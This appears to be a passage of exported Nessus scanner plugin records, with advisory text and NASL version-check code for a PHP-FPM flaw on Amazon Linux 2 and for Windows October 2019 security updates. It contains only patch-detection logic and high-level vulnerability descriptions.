{"nessus": [{"lastseen": "2019-12-13T06:38:50", "bulletinFamily": "scanner", "description": "In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below\n7.3.11 in certain configurations of FPM setup it is possible to cause\nFPM module to write past allocated buffers into the space reserved for\nFCGI protocol data, thus opening the possibility of remote code\nexecution.(CVE-2019-11043)", "modified": "2019-12-02T00:00:00", "id": "AL2_ALAS-2019-1344.NASL", "href": "https://www.tenable.com/plugins/nessus/130470", "published": "2019-11-04T00:00:00", "title": "Amazon Linux 2 : php (ALAS-2019-1344)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2019-1344.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130470);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2019-11043\");\n script_xref(name:\"ALAS\", value:\"2019-1344\");\n\n script_name(english:\"Amazon Linux 2 : php (ALAS-2019-1344)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux 2 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below\n7.3.11 in certain configurations of FPM setup it is possible to cause\nFPM module to write past allocated buffers into the space reserved for\nFCGI protocol data, thus opening the possibility of remote code\nexecution.(CVE-2019-11043)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/AL2/ALAS-2019-1344.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php' to update your system.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-pspell\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"AL2\", 
reference:\"php-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-bcmath-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-cli-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-common-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-dba-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-debuginfo-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-devel-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-embedded-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-enchant-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-fpm-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-gd-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-intl-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-ldap-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-mbstring-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-mysqlnd-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-odbc-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-pdo-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-pgsql-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-process-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-pspell-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-recode-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-snmp-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-soap-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", 
reference:\"php-xml-5.4.16-46.amzn2.0.2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"php-xmlrpc-5.4.16-46.amzn2.0.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-debuginfo / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-14T09:20:17", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4519990\nor cumulative update 4520005. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. 
An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the user's system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non-Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user.
(CVE-2019-1238)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2019-1334)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it.
An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function run by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the user's system. (CVE-2019-1060)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n do not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service improperly handles a\n Registry Restore Key function.
An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS19_OCT_4520005.NASL", "href": "https://www.tenable.com/plugins/nessus/129722", "published": "2019-10-08T00:00:00", "title": "KB4519990: Windows 8.1 and Windows Server 2012 R2 October 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129722);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/12/13\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1060\",\n \"CVE-2019-1166\",\n \"CVE-2019-1238\",\n \"CVE-2019-1311\",\n \"CVE-2019-1315\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1325\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1334\",\n \"CVE-2019-1339\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1343\",\n \"CVE-2019-1344\",\n \"CVE-2019-1346\",\n \"CVE-2019-1347\",\n \"CVE-2019-1357\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1365\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4519990\");\n script_xref(name:\"MSKB\", value:\"4520005\");\n script_xref(name:\"MSFT\", value:\"MS19-4519990\");\n script_xref(name:\"MSFT\", value:\"MS19-4520005\");\n\n script_name(english:\"KB4519990: Windows 8.1 and Windows Server 2012 R2 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4519990\nor cumulative update 4520005. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. 
(CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. 
An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. 
The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4519990/windows-8-1-kb4519990\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4520005/windows-8-1-kb4520005\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4519990 or Cumulative Update KB4520005.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4520005', '4519990');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4520005, 4519990])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n 
hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-14T09:20:17", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4519985\nor cumulative update 4520007. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the user's system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non-Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding.
(CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function run by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input.
An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS19_OCT_4520007.NASL", "href": "https://www.tenable.com/plugins/nessus/129723", "published": "2019-10-08T00:00:00", "title": "KB4519985: Windows Server 2012 October 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
